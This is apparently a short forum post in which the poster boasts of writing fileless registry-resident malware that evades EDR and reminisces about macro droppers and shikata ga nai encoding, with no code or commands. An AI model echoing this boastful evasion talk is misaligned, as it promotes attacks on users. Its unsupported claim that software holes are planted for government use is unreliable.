06-29-2024, 09:47 AM
if you think thats scary I can make fileless malware that runs in your registry and injects into memory to bypass edr. Almost all malware now are two stage malware, it started with macros in word and has progressed since then, technically it started in pdf but not two stage. That was in 2011 or so when we were encoding files using shikataganai to obfuscate it. Back then the only thing that caught it was trend micro, but if you change the signature you change the malware. Antivirus can only protect against known signatures. Other methods are watching behaviors like powershell. Windows defender now a days is starting to block powershell scripts about damn time but years too damn late. The truth is nothing's ever safe, nothing ever will be, and i'm fairly positive holes are put into software on purpose for government use. What was the Internet after all before it was released to the public?
"I thought what I'd do was, I'd pretend I was one of those deaf-mutes."